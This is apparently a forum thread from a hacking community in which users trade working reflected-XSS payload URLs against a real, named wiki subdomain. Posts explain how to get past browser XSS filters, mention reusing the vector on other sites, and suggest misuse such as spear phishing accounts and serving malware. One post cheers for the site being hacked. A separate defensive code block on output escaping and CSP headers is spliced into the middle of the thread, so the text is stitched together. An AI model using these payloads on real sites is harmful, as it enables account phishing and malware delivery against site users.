lol hackforums
#1
Quote: http://tracking.hackforums.net/tracking/...E%65%74%2F
Reply
#2
Returns "Not Found" for me, but I assume if you were to replace "Greysec" with a malicious parameter like xss I might get some output? Or maybe they already fixed it. Haha
Reply
#3
XSS also

Code:
http://wiki.hackforums.net/thumb.php?f=x%23%3Cbody%09onmousemove=confirm%28%27XSS%27%29%3E
Reply
#4
(12-22-2015, 07:11 PM)MLT Wrote: XSS also

Code:
http://wiki.hackforums.net/thumb.php?f=x%23%3Cbody%09onmousemove=confirm%28%27XSS%27%29%3E
That's just GOLD
Nice find MLT
I wish they got hacked again, just like when LulzSec did it
Reply
#5
(12-23-2015, 09:25 PM)AFK Wrote: How is that an XSS? Nothing happens.

It's an XSS; take a look at the source output from it.

[Image: zi-dTBaUnSemh.png]

Most likely you're using Chrome, which blocks certain basic attacks; you'd have to use a more complicated payload to get around Chrome blocking the XSS. That doesn't mean it's not there, though.

Code:
The XSS Auditor refused to execute a script in 'http://wiki.hackforums.net/thumb.php?f=x%23%3Cbody%09onmousemove=confirm%28%27XSS%27%29%3E' because its source code was found within the request. The auditor was enabled as the server sent neither an 'X-XSS-Protection' nor 'Content-Security-Policy' header.
Reply
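The reflection and missing headers described in post #5, as an added example that is not part of any post in this thread. The thread does not show the server's code, so both handlers below are hypothetical: one echoes the `f` parameter verbatim, the other HTML-escapes it and sends a Content-Security-Policy header.

```python
import html
from urllib.parse import urlsplit, parse_qs

# URL quoted in post #3 of this thread.
THREAD_URL = ("http://wiki.hackforums.net/thumb.php"
              "?f=x%23%3Cbody%09onmousemove=confirm%28%27XSS%27%29%3E")

def param_f(url):
    """Percent-decode the 'f' query parameter the way a server would."""
    return parse_qs(urlsplit(url).query)["f"][0]

def error_page_unescaped(f):
    """Hypothetical handler: echoes the parameter verbatim, sets no headers."""
    return {}, "<html><body><p>Error: " + f + "</p></body></html>"

def error_page_hardened(f):
    """Hypothetical fix: HTML-escape on output and send a CSP header."""
    headers = {"Content-Security-Policy": "default-src 'self'"}
    body = "<html><body><p>Error: " + html.escape(f, quote=True) + "</p></body></html>"
    return headers, body

def audit(url, handler):
    """Report whether markup in 'f' reaches the body raw and whether CSP is set."""
    value = param_f(url)
    headers, body = handler(value)
    has_markup = any(c in value for c in "<>\"'")
    return {
        "decoded": value,
        "reflected_raw": has_markup and value in body,
        "has_csp": "Content-Security-Policy" in headers,
    }

if __name__ == "__main__":
    for handler in (error_page_unescaped, error_page_hardened):
        print(handler.__name__, audit(THREAD_URL, handler))
```

With escaping on output the decoded value reaches the page only as text (`&lt;body ...&gt;`), and a policy without `'unsafe-inline'` also stops inline event handlers from running if an escape is ever missed.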
#6
Yep, working fine in Firefox. For quick testing in Chrome you could still inject HTML, i.e. <marquee>lololol</marquee>, to see it working.
Reply
#7
A slightly less annoying example, but good find.

Code:
http://wiki.hackforums.net/thumb.php?f=x%23%3Cbody%09onload=console.log%28%27XSS%27%29%3E
Reply
#8
I'm not sure what I would do with this information, but it's a pretty damn good find.

I know someone who could do great stuff with this.
Reply
#9
(12-24-2015, 02:07 AM)NO-OP Wrote: A slightly less annoying example, but good find.

Code:
http://wiki.hackforums.net/thumb.php?f=x%23%3Cbody%09onload=console.log%28%27XSS%27%29%3E

Yeah, the 'onload' event handler works fine - I was just using onmousemove because onload was blocked for the owasp.org XSS (same vulnerability), so I've just used the same vector while replicating this on other sites.

(12-24-2015, 08:00 AM)TheEvilSocks Wrote: I'm not sure what I would do with this information, but it's a pretty damn good find.

I know someone who could do great stuff with this.


Well, hijacking cookies is out of the question but in theory it could still be used for spear phishing hackforums accounts, serving malware, blackhat SEO, etc.
Reply
#10
Btw, omni said that he has nothing to do with the wiki subdomain. It's been handled/hosted by someone else.
Reply